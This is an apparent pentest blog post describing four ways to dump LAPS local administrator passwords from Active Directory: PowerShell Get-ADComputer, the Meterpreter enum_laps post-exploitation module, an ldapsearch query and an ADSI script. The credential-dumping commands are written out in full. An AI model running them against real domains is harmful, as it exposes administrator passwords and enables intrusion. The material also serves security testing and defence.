Dump LAPS password in clear text

This blog post is inspired from  Rob ‘mubix’ Fuller post on “Dump LAPS passwords with ldapsearch“. So in this blog post we will explore different methods or ways to dump LAPS password in clear text. By Default all the Domain Admins have view access to ms-MCS-AdmPwd attribute. Lets have a look at the following ways in which we can dump the LAPS password

Active Directory Module: Lets say the machine has RSAT enabled and user can import the active directory module. After importing the Active Directory module fire the cmdlet: “Get-ADComputer” and look for the attribute ‘ms-MCS-AdmPwd’ .

Import-module activdirectory
Get-ADComputer -Identity LAB-WIN7CLONE -properties *

Meterpreter: If you have a shiny meterpreter session running,  You can run the post expolitation module ‘enum_laps’.  By running this command you will get Distinguised Name, ms-MCS-AdmPwd, ms-MCS-AdmPwdExpirationTime and DNS hostname.

run this command from meterpreter session:

run post/windows/gather/credentials/enum_laps

LDAP Search: As mentioned in the blog post of Rob ‘mubix’ Fuller, we will use ldapsearch from our very own kali linux box to dump ‘ms-MCS-AdmPwd ‘attribute.

ldapsearch -x -h 10.10.10.254 -D <<username>> -w <<password>> -b "dc=AJLAB,dc=COM" "(ms-MCS-AdmPwd=*)" ms-MSC-AdmPwd

I have also created a video for all the above methods

ADSI: Probably the last method to dump LAPS password. Let’s say RSAT is not enabled on the windows box and if we want to get the attributes of ms-MCS-AdmPwd, Active Directory Service Interfaces to our rescue. The ADSI module can get the computer properties.

$domain = New-Object DirectoryServices.DirectoryEntry("LDAP://OU=Managed Computers- LAPS,DC=AJLAB,DC=COM")
$user=$domain.Get_Children().find('CN=LAB-WIN7CLONE')
$user | Format-List *

 

PS: Kindly comment any other cool methods to dump LAPS password.

Note: All of the above methods will only work if the user has view access to ms-MCS-AdmPwd attribute and Extended Rights have not been removed for users and groups.

Advertisements

2 thoughts on “Dump LAPS password in clear text

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s